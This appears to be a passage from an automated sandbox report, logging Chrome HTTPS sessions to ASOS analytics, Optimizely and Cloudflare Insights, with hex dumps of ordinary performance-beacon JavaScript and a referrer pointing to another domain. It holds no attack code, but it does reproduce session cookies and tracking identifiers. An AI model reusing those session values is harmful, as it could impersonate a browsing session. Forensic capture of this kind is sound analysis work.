                                                                                                                                                                                                                                                                                      2024-10-24 22:07:39 UTC1369INData Raw: 30 3f 72 3d 22 70 72 65 72 65 6e 64 65 72 22 3a 64 6f 63 75 6d 65 6e 74 2e 77 61 73 44 69 73 63 61 72 64 65 64 3f 72 3d 22 72 65 73 74 6f 72 65 22 3a 6e 2e 74 79 70 65 26 26 28 72 3d 6e 2e 74 79 70 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2d 22 29 29 29 2c 7b 6e 61 6d 65 3a 65 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 3d 3d 3d 74 3f 2d 31 3a 74 2c 72 61 74 69 6e 67 3a 22 67 6f 6f 64 22 2c 64 65 6c 74 61 3a 30 2c 65 6e 74 72 69 65 73 3a 5b 5d 2c 69 64 3a 22 76 33 2d 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 2c 6e 61 76 69 67 61 74 69 6f 6e 54 79 70 65 3a 72 7d 7d 2c
                                                                                                                                                                                                                                                                                      Data Ascii: 0?r="prerender":document.wasDiscarded?r="restore":n.type&&(r=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:39 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 3c 30 26 26 28 77 3d 53 28 29 2c 45 28 29 2c 6c 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 3d 53 28 29 2c 45 28 29 7d 29 2c 30 29 7d 29 29 29 2c 7b 67 65 74 20 66 69 72 73 74 48 69 64 64 65 6e 54 69 6d 65 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 6f 63 75 6d 65 6e 74 2e 70
                                                                                                                                                                                                                                                                                      Data Ascii: function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},C=function(){return w<0&&(w=S(),E(),l((function(){setTimeout((function(){w=S(),E()}),0)}))),{get firstHiddenTime(){return w}}},P=function(e){document.p


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      68192.168.2.164992063.140.62.174436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:39 UTC3701OUTGET /b/ss/asoscomprod/1/JS-2.1.0/s74936239296110?AQB=1&ndh=1&pf=1&t=24%2F9%2F2024%2018%3A7%3A20%204%20240&mid=16517622310589015242779979940996246389&aamlh=6&ce=UTF-8&ns=asos&pageName=desktop%20com%7Chome%20page%7Chome&g=https%3A%2F%2Fwww.asos.com%2F&r=https%3A%2F%2Ffkmd.lioninkey.com%2F&ch=home%20page%20&server=desktop%20com&events=event128%3D-1729807628574%2Cevent121%2Cevent79&aamb=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&c1=home&v1=1&c2=home&c3=home&c5=2024-10-24T22%3A07%3A20.097Z&v6=home&c8=home&c11=https%3A%2F%2Fwww.asos.com%2F&v17=New&v19=1280%3A907&v29=1284&v30=-1729807628574&c39=mw%20brand%201%2Cmw%20brand%202%2Cmw%20brand%203%2Cmw%20brand%204%2Cww%20brand%201%2Cww%20brand%202%2Cww%20brand%203%2Cww%20brand%204%2Cww%20brand%201%2Cww%20brand%202%2Cww%20brand%203%2Cww%20brand%204%2Cshop%20mw%20brands%20cta%2Cshop%20ww%20brands%20cta%2Cfeature%201%2Cfeature%202%2Cfeature%203%2Cfeature%204%2Chero%2Cthe%20biggest%20labels%20title%2Cwomens%20categories%20title%2Cww%20uk%20seo%20links%2Cmens%20cate [TRUNCATED]
                                                                                                                                                                                                                                                                                      Host: metrics.asos.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: geocountry=US; bm_sz=66435E81E02E031738C051A9C8A74AF3~YAAQF/AQAsZeXK+SAQAAPMKRwBmbT1ort/PqojSUhpdsyHRIfHwsQUxvVepaTsNYtWsG1Dl/xJqL+CVPH+iigYMT7vVUY1stUT+KiywrgeEluljLSKNdUVBoafeQKYHgt5gK1cPPBUCroecFDNTYLbgLqxCba7/3lOOaBEs+uIoGJVa4hsi3ovF8uyVOFeRdHfABs/MIPbhRAl956CgROvYu36x0zeq24E97kGOtElsnp0cU4WGYbqXdHakBub5G3QZLjufqAJjCchWDhFLkSS27DaUY6c0AiG6lcCCuuvVmcH6ZrAvvIJWhIF1NjLTb+N7sRGZEna6vEj4VhOR5aU6iYRaH35OfGS3352Z2fs8P+meV/Tr1u75lasHr0ICGeiU=~3490353~4536372; RT="z=1&dm=asos.com&si=2a741c90-c15a-4741-ad5f-9ff5e6d0d0dd&ss=m2nussgu&sl=0&tt=0&bcn=%2F%2F684dd329.akstat.io%2F"; AMCVS_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=1; s_ecid=MCMID%7C16517622310589015242779979940996246389; keyStoreDataversion=mhabj1f-41; browseCountry=GB; asos-anon12=0192c091e60e7a4695759c14c2bfe766; asos-ts121=0192c091-e60f-781f-a379-115ecb8dc377; s_pers=%20eVar225%3D1%7C1729809432855%3B%20s_vnum%3D1730433600857%2526vn%253D1%7C1730433600857%3B%20visitCount%3D1%7C1729809432866%3B%20s_invisit%3Dtrue%7C1729809440086%3B%20s_nr%3D1729807640088- [TRUNCATED]
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:39 UTC724INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                                                      date: Thu, 24 Oct 2024 22:07:39 GMT
                                                                                                                                                                                                                                                                                      expires: Wed, 23 Oct 2024 22:07:39 GMT
                                                                                                                                                                                                                                                                                      last-modified: Fri, 25 Oct 2024 22:07:39 GMT
                                                                                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                                                                                      p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                      server: jag
                                                                                                                                                                                                                                                                                      set-cookie: s_ecid=MCMID%7C16517622310589015242779979940996246389; Path=/; Domain=asos.com; Max-Age=63072000; Expires=Sat, 24 Oct 2026 22:07:07 GMT;
                                                                                                                                                                                                                                                                                      etag: 3714733663916851200-4618518228654668816
                                                                                                                                                                                                                                                                                      vary: *
                                                                                                                                                                                                                                                                                      content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                      content-length: 43
                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:39 UTC43INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      69192.168.2.1649923104.18.66.574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC691OUTPOST /cdn-cgi/rum? HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 1656
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      content-type: application/json
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://a19065870423.cdn.optimizely.com/client_storage/a19065870423.html
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1656OUTData Raw: 7b 22 6d 65 6d 6f 72 79 22 3a 7b 22 74 6f 74 61 6c 4a 53 48 65 61 70 53 69 7a 65 22 3a 33 33 36 31 31 37 36 2c 22 75 73 65 64 4a 53 48 65 61 70 53 69 7a 65 22 3a 32 35 32 34 37 31 32 2c 22 6a 73 48 65 61 70 53 69 7a 65 4c 69 6d 69 74 22 3a 32 31 37 32 36 34 39 34 37 32 7d 2c 22 72 65 73 6f 75 72 63 65 73 22 3a 5b 5d 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 73 6f 73 2e 63 6f 6d 2f 22 2c 22 65 76 65 6e 74 54 79 70 65 22 3a 31 2c 22 66 69 72 73 74 50 61 69 6e 74 22 3a 30 2c 22 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 22 3a 30 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 31 37 32 39 38 30 37 36 35 36 31 35 32 2c 22 76 65 72 73 69 6f 6e 73 22 3a 7b 22 66 6c 22 3a 22 32 30 32 34 2e 31 30 2e 33 22 2c 22 6a 73 22
                                                                                                                                                                                                                                                                                      Data Ascii: {"memory":{"totalJSHeapSize":3361176,"usedJSHeapSize":2524712,"jsHeapSizeLimit":2172649472},"resources":[],"referrer":"https://www.asos.com/","eventType":1,"firstPaint":0,"firstContentfulPaint":0,"startTime":1729807656152,"versions":{"fl":"2024.10.3","js"
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:40 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      access-control-allow-origin: https://a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                                                                                                                                                                                                                      access-control-max-age: 86400
                                                                                                                                                                                                                                                                                      vary: Origin
                                                                                                                                                                                                                                                                                      access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d47f48a33474f-DFW
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      70192.168.2.1649922104.16.80.734436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC413OUTGET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: static.cloudflareinsights.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:40 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 19948
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                      ETag: W/"2024.6.1"
                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 06 Jun 2024 15:52:56 GMT
                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d47f4cdd26b0b-DFW
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC996INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 33 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 32 35 36 3b 2b 2b 6e 29 74 5b 6e 5d 3d 28 6e 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 7c 7c 30 2c 69 3d 74 3b 72 65 74 75 72 6e 5b 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b
                                                                                                                                                                                                                                                                                      Data Ascii: !function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r+
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 3b 69 66 28 61 5b 36 5d 3d 31 35 26 61 5b 36 5d 7c 36 34 2c 61 5b 38 5d 3d 36 33 26 61 5b 38 5d 7c 31 32 38 2c 74 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 31 36 3b 2b 2b 63 29 74 5b 6f 2b 63 5d 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 69 28 61 29 7d 7d 2c 31 36 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67
                                                                                                                                                                                                                                                                                      Data Ascii: ;if(a[6]=15&a[6]|64,a[8]=63&a[8]|128,t)for(var c=0;c<16;++c)t[o+c]=a[c];return t||i(a)}},168:function(e,t,n){"use strict";var r=this&&this.__assign||function(){return r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var i in t=arg
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 72 63 68 50 61 72 61 6d 73 29 7b 76 61 72 20 79 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 67 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5e 5c 3f 5d 2b 5c 3f 3f 2f 2c 22 22 29 29 2c 68 3d 79 2e 67 65 74 28 22 74 6f 6b 65 6e 22 29 3b 68 26 26 28 70 2e 74 6f 6b 65 6e 3d 68 29 3b 76 61 72 20 54 3d 79 2e 67 65 74 28 22 73 70 61 22 29 3b 70 2e 73 70 61 3d 6e 75 6c 6c 3d 3d 3d 54 7c 7c 22 74 72 75 65 22 3d 3d 3d 54 7d 7d 70 26 26 22 6d 75 6c 74 69 22 21 3d 3d 70 2e 6c 6f 61 64 26 26 28 70 2e 6c 6f 61 64 3d 22 73 69 6e 67 6c 65 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 63 66 42 65 61 63 6f 6e 3d 70 7d 69 66 28 73 26 26 70 26 26 70 2e 74 6f 6b 65 6e 29 7b 76 61 72 20 77 2c 53 2c 62 3d 21 31 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                                                      Data Ascii: rchParams){var y=new URLSearchParams(g.replace(/^[^\?]+\??/,"")),h=y.get("token");h&&(p.token=h);var T=y.get("spa");p.spa=null===T||"true"===T}}p&&"multi"!==p.load&&(p.load="single"),window.__cfBeacon=p}if(s&&p&&p.token){var w,S,b=!1;document.addEventList
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 2e 74 69 6d 69 6e 67 73 56 32 3d 7b 7d 2c 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 3d 32 2c 64 2e 64 74 3d 6d 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 2c 64 65 6c 65 74 65 20 64 2e 74 69 6d 69 6e 67 73 2c 74 28 6d 5b 30 5d 2c 64 2e 74 69 6d 69 6e 67 73 56 32 29 29 7d 31 3d 3d 3d 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 26 26 74 28 63 2c 64 2e 74 69 6d 69 6e 67 73 29 2c 74 28 75 2c 64 2e 6d 65 6d 6f 72 79 29 7d 65 6c 73 65 20 4f 28 64 29 3b 72 65 74 75 72 6e 20 64 2e 66 69 72 73 74 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 70 61 69 6e 74 22 29 2c 64 2e 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 29 2c 70 26 26 28 70 2e 69 63
                                                                                                                                                                                                                                                                                      Data Ascii: .timingsV2={},d.versions.timings=2,d.dt=m[0].deliveryType,delete d.timings,t(m[0],d.timingsV2))}1===d.versions.timings&&t(c,d.timings),t(u,d.memory)}else O(d);return d.firstPaint=k("first-paint"),d.firstContentfulPaint=k("first-contentful-paint"),p&&(p.ic
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 65 72 65 64 3a 21 30 7d 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 52 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 52 29 7d 29 29 3b 76 61 72 20 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 26 26 30 3d 3d 3d 76 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 69 64 3d 3d 3d 6c 7d 29 29 2e 6c 65 6e 67 74 68 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 2e 70 75 73 68 28 7b 69 64 3a 6c 2c 75 72 6c 3a 65 2c 74 73 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65
                                                                                                                                                                                                                                                                                      Data Ascii: ered:!0}};"complete"===window.document.readyState?R():window.addEventListener("load",(function(){window.setTimeout(R)}));var A=function(){return L&&0===v.filter((function(e){return e.id===l})).length},_=function(e){v.push({id:l,url:e,ts:(new Date).getTime
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 72 63 65 4c 6f 61 64 54 69 6d 65 2c 45 2e 6c 63 70 2e 65 72 64 3d 63 2e 65 6c 65 6d 65 6e 74 52 65 6e 64 65 72 44 65 6c 61 79 2c 45 2e 6c 63 70 2e 69 74 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 63 2e 6c 63 70 52 65 73 6f 75 72 63 65 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 69 6e 69 74 69 61 74 6f 72 54 79 70 65 2c 45 2e 6c 63 70 2e 66 70 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 63 2e 6c 63 70 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 65 6c 65 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 66 65 74 63 68 70 72 69 6f 72 69 74 79 22 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 49 4e 50 22
                                                                                                                                                                                                                                                                                      Data Ascii: rceLoadTime,E.lcp.erd=c.elementRenderDelay,E.lcp.it=null===(i=c.lcpResourceEntry)||void 0===i?void 0:i.initiatorType,E.lcp.fp=null===(a=null===(o=c.lcpEntry)||void 0===o?void 0:o.element)||void 0===a?void 0:a.getAttribute("fetchpriority"));break;case"INP"
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 64 65 64 42 6f 64 79 53 69 7a 65 26 26 28 72 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 3d 6e 5b 30 5d 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 29 2c 65 2e 64 74 3d 6e 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 29 2c 74 28 72 2c 65 2e 74 69 6d 69 6e 67 73 56 32 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 76 61 72 20 74 3b 69 66 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3d 3d 3d 65 26 26 45 2e 66 63 70 26 26 45 2e 66 63 70 2e 76 61 6c 75 65 29 72 65 74 75 72 6e 20 45 2e 66 63 70 2e 76 61 6c 75 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 73 2e 67 65 74 45 6e 74 72 69
                                                                                                                                                                                                                                                                                      Data Ascii: dedBodySize&&(r.decodedBodySize=n[0].decodedBodySize),e.dt=n[0].deliveryType),t(r,e.timingsV2)}}function k(e){var t;if("first-contentful-paint"===e&&E.fcp&&E.fcp.value)return E.fcp.value;if("function"==typeof s.getEntriesByType){var n=null===(t=s.getEntri
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 76 65 6e 74 54 79 70 65 3d 7b 7d 29 29 5b 72 2e 4c 6f 61 64 3d 31 5d 3d 22 4c 6f 61 64 22 2c 72 5b 72 2e 41 64 64 69 74 69 6f 6e 61 6c 3d 32 5d 3d 22 41 64 64 69 74 69 6f 6e 61 6c 22 2c 72 5b 72 2e 57 65 62 56 69 74 61 6c 73 56 32 3d 33 5d 3d 22 57 65 62 56 69 74 61 6c 73 56 32 22 2c 28 6e 3d 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 7c 7c 28 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 3d 7b 7d 29 29 2e 48 69 67 68 3d 22 68 69 67 68 22 2c 6e 2e 4c 6f 77 3d 22 6c 6f 77 22 2c 6e 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 2c 31 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77
                                                                                                                                                                                                                                                                                      Data Ascii: ventType={}))[r.Load=1]="Load",r[r.Additional=2]="Additional",r[r.WebVitalsV2=3]="WebVitalsV2",(n=t.FetchPriority||(t.FetchPriority={})).High="high",n.Low="low",n.Auto="auto"},104:function(e,t){!function(e){"use strict";var t,n,r,i,o,a=function(){return w
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:40 UTC1369INData Raw: 30 3f 72 3d 22 70 72 65 72 65 6e 64 65 72 22 3a 64 6f 63 75 6d 65 6e 74 2e 77 61 73 44 69 73 63 61 72 64 65 64 3f 72 3d 22 72 65 73 74 6f 72 65 22 3a 6e 2e 74 79 70 65 26 26 28 72 3d 6e 2e 74 79 70 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2d 22 29 29 29 2c 7b 6e 61 6d 65 3a 65 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 3d 3d 3d 74 3f 2d 31 3a 74 2c 72 61 74 69 6e 67 3a 22 67 6f 6f 64 22 2c 64 65 6c 74 61 3a 30 2c 65 6e 74 72 69 65 73 3a 5b 5d 2c 69 64 3a 22 76 33 2d 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 2c 6e 61 76 69 67 61 74 69 6f 6e 54 79 70 65 3a 72 7d 7d 2c
                                                                                                                                                                                                                                                                                      Data Ascii: 0?r="prerender":document.wasDiscarded?r="restore":n.type&&(r=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},
